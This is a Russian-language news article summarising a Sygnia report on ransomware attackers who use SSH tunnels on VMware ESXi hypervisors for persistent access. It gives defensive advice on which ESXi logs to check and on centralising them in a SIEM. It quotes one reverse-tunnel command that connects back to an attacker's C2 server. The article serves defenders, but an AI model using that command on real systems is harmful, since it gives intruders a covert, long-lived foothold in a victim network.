Sygnia: вымогатели атакуют гипервизоры ESXi

Хакеры, нацеленные на гипервизоры ESXi, используют туннелирование SSH для сохранения доступа к системе и обхода обнаружения. Эти устройства позволяют запускать на одном физическом сервере множество виртуальных машин.

Из-за отсутствия надсмтора гипервизоры ESXi часто становятся объектами атак. Злоумышленники, проникнув в корпоративную сеть, крадут данные и шифруют файлы, фактически парализуя работу компании, делая виртуальные машины недоступными, пишет Securitylab.

Согласно отчёту компании Sygnia, компрометация гипервизоров часто достигается путём эксплуатации известных уязвимостей или использования скомпрометированных учётных данных администраторов. ESXi имеет встроенный SSH-сервис, позволяющий администраторам удалённо управлять гипервизором. Эту функцию злоумышленники используют для организации устойчивого доступа, перемещения по сети и внедрения программ-вымогателей.

Sygnia отмечает, что злоумышленники устанавливают туннели с помощью встроенной функциональности SSH или популярных инструментов, предоставляющих схожие возможности. Пример команды для настройки перенаправления порта:

ssh –fN -R 127.0.0.1:<порт SOCKS> <пользователь>@<IP C2 сервера>

«ESXi-устройства редко перезагружаются неожиданно, что позволяет использовать такой туннель как полупостоянную точку входа в сеть», — объясняет Sygnia.

Важным фактором успеха атак является сложность мониторинга логов ESXi. В отличие от большинства систем, где логи хранятся в одном файле, ESXi распределяет их по нескольким местам. Это усложняет поиск улик, поскольку данные нужно собирать из множества источников. Для обнаружения активности злоумышленников Sygnia рекомендует проверять следующие файлы:

• /var/log/shell.log — отслеживает выполнение команд в оболочке ESXi;
• /var/log/hostd.log — фиксирует административные действия и аутентификацию пользователей;
• /var/log/auth.log — регистрирует попытки входа и события аутентификации;
• /var/log/vobd.log — хранит системные и информационные события безопасности.

Кроме того, логи hostd.log и vobd.log могут содержать следы изменения правил файервола, что необходимо для сохранения постоянного SSH-доступа. Однако злоумышленники часто очищают журналы, изменяют временные метки или укорачивают логи, чтобы скрыть свои действия.

Для повышения безопасности рекомендуется централизовать логи ESXi с помощью пересылки syslog и интеграции их в систему управления событиями безопасности (SIEM) для выявления аномалий.